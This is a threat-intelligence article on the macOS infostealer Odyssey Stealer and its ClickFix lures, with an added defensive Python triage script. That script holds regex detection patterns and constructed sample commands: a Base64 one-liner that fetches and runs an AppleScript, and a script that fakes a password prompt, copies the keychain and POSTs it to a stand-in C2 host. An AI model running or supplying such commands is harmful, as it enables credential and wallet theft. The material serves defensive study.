
A new player has emerged in the macOS malware ecosystem—Odyssey Stealer—leveraging clever social engineering and targeting cryptocurrency users across the Western world. In its latest threat intelligence report, the CYFIRMA research team exposes how this stealthy infostealer weaponizes fake App Store prompts and typosquatted domains to infiltrate systems and exfiltrate highly sensitive data.
According to CYFIRMA:
“The CYFIRMA research team has uncovered multiple websites employing Clickfix tactics to deliver malicious AppleScripts (osascripts)… designed to steal browser cookies, passwords, cryptocurrency wallet data, and browser plugins.”
These malicious sites masquerade as Apple App Store or financial service platforms. Users are tricked into running terminal commands copied from these phony CAPTCHA pages—unknowingly unleashing malware on their own machines.
The ClickFix technique is a form of social engineering:
- The victim lands on a typosquatted or spoofed domain.
- They are shown a fake Cloudflare CAPTCHA.
- macOS users are instructed to paste a Base64-encoded command into the terminal; once decoded and run, it executes a malicious AppleScript via osascript.
- This script fetches a payload from a remote command-and-control server.
“Upon execution, the malware displays a fake prompt designed to capture the user’s password… [then] copies macOS keychain files… to a temporary folder /tmp/lovemrtrump.”
The malware targets desktop wallets such as Electrum, Coinomi, and Exodus and browser-extension wallets such as MetaMask, harvesting wallet files and seed phrases along with cookies and session tokens from Chrome, Firefox, Safari, and other Chromium-based browsers.
Odyssey Stealer is a full-spectrum infostealer. Among the data it collects:
- Keychain credentials and user-entered passwords.
- Cryptocurrency wallet files and seed phrases.
- Login data, payment info, and cookies for session hijacking.
- Documents, images, and password databases with extensions such as .txt, .pdf, .docx, .jpg, and .kdbx (KeePass).
The stolen data is zipped into out.zip and exfiltrated via a curl POST request—retrying silently up to 10 times if the connection fails.
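A responder who gets hold of one of these lure pages usually has only the one-liner the victim was told to paste, so the first job is to decode it and see what it does. The Python triage helper below is an added example, not code from CYFIRMA or from the report: it expands nested Base64 blobs in a pasted command and then matches every layer against the stage behaviours described in the ClickFix steps above and in the exfiltration paragraph (osascript execution, a remote fetch via curl, a password dialog with a hidden answer, a keychain copy to /tmp, a zip archive, and a curl POST inside a retry loop). The sample commands, the `.invalid` hostnames, and the indicator labels are constructed for this example and are not indicators taken from the report.

```python
"""Triage a ClickFix-style pasted command: decode Base64 layers, then match
each layer against the stage behaviours described for Odyssey Stealer.
Added example; the sample inputs below are constructed, not real lure content."""
import base64
import binascii
import re

# Indicator labels are my own; each regex encodes one behaviour from the report.
INDICATORS = {
    "osascript_exec": re.compile(r"\bosascript\b"),
    "remote_fetch": re.compile(r"\bcurl\b[^\n;|&]*https?://"),
    "hidden_password_dialog": re.compile(r"display dialog.*with hidden answer", re.I),
    "keychain_copy": re.compile(r"Library/Keychains", re.I),
    "tmp_staging": re.compile(r"/tmp/[A-Za-z0-9_.-]+"),
    "zip_archive": re.compile(r"\bzip\b.*\.zip\b"),
    "curl_post_exfil": re.compile(r"\bcurl\b[^\n]*(?:-X\s*POST|--data|-F\s)"),
    "retry_loop": re.compile(r"repeat\s+\d+\s+times|for\s+\w+\s+in\s+\{1\.\.\d+\}|while\s+true", re.I),
}

# A Base64 blob long enough to carry a command; padding is optional.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_base64_layers(text, max_depth=3):
    """Return [text, decoded blob, decoded blob found inside that, ...].

    Only blobs that decode to printable UTF-8 are kept, so random
    alphanumeric runs (hashes, tokens) are ignored rather than expanded."""
    layers = [text]
    frontier = [text]
    for _ in range(max_depth):
        next_frontier = []
        for layer in frontier:
            for token in _B64_TOKEN.findall(layer):
                try:
                    decoded = base64.b64decode(token, validate=True).decode("utf-8")
                except (binascii.Error, ValueError, UnicodeDecodeError):
                    continue
                if decoded and all(ch.isprintable() or ch in "\n\r\t" for ch in decoded):
                    next_frontier.append(decoded)
        if not next_frontier:
            break
        layers.extend(next_frontier)
        frontier = next_frontier
    return layers


def triage(command, max_depth=3):
    """Decode every layer of a pasted command and report the behaviours matched."""
    layers = decode_base64_layers(command, max_depth)
    hits = {name for layer in layers for name, rx in INDICATORS.items() if rx.search(layer)}
    # An encoded stage that fetches something or runs osascript is enough on its own;
    # otherwise require several behaviours so ordinary install one-liners stay clean.
    encoded_stage = len(layers) > 1 and bool(hits & {"osascript_exec", "remote_fetch"})
    verdict = "suspicious" if encoded_stage or len(hits) >= 3 else "clean"
    return {"layers": len(layers), "indicators": sorted(hits), "verdict": verdict}


# --- constructed samples (hostnames use the reserved .invalid TLD) ---
# Stage 1: the kind of one-liner a ClickFix page tells the victim to paste.
# The inner command is encoded here so the decode step is shown end to end.
STAGE1_INNER = "curl -fsSL http://lure.example.invalid/p.txt -o /tmp/p.scpt && osascript /tmp/p.scpt"
CLICKFIX_COMMAND = "echo " + base64.b64encode(STAGE1_INNER.encode()).decode() + " | base64 -d | sh"

# Stage 2: a sketch of the fetched AppleScript's observable behaviours
# (password dialog, keychain copy to /tmp, zip, curl POST with retries).
STAGE2_SCRIPT = """
set pw to text returned of (display dialog "macOS needs your password" default answer "" with hidden answer)
do shell script "cp ~/Library/Keychains/login.keychain-db /tmp/stage/ && cd /tmp/stage && zip -r out.zip ."
repeat 10 times
    try
        do shell script "curl -s -X POST -F data=@/tmp/stage/out.zip http://c2.example.invalid/gate"
        exit repeat
    end try
end repeat
"""

# Benign one-liner with a remote fetch and a /tmp path, to show the threshold.
BENIGN_COMMAND = "curl -fsSL https://example.invalid/README.md -o /tmp/readme.md && less /tmp/readme.md"

if __name__ == "__main__":
    for label, sample in (("clickfix", CLICKFIX_COMMAND), ("stage2", STAGE2_SCRIPT), ("benign", BENIGN_COMMAND)):
        print(label, triage(sample))
```

A pasted command that carries an encoded stage which fetches a payload or runs osascript is flagged on that alone; anything else needs three or more matched behaviours, so a plain `curl ... -o /tmp/...` install line stays clean. The patterns and the threshold are a starting point to tune against your own telemetry, not a substitute for the report's indicators.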
Behind the scenes, attackers use a web-based command-and-control panel:
“The panel provides a structured interface for attackers to manage stolen data, configure malware behavior, and deploy attacks.”
Features include dashboards, malware builders, bot listings, and a “Google Cookies Restore” function—used to hijack live sessions from stolen browser data. Most panels identified were hosted in Russia.
Odyssey Stealer descends from AMOS Stealer by way of Poseidon Stealer and inherits much of that codebase. According to CYFIRMA:
“Odyssey Stealer represents the latest evolution in macOS-targeting malware, emerging as a rebranded version of Poseidon Stealer which itself originated as a fork of the AMOS Stealer.”
Evidence from dark web forums suggests “Rodrigo,” the original AMOS author, is actively involved in Odyssey’s development—positioning it as a direct competitor to its predecessor in the macOS malware-as-a-service (MaaS) market.
Odyssey Stealer exemplifies the growing sophistication of macOS-targeted threats. Its use of convincing fake websites, real-time credential validation, and professional-grade infrastructure underlines the shift of macOS malware from novelty to serious cybercrime tool.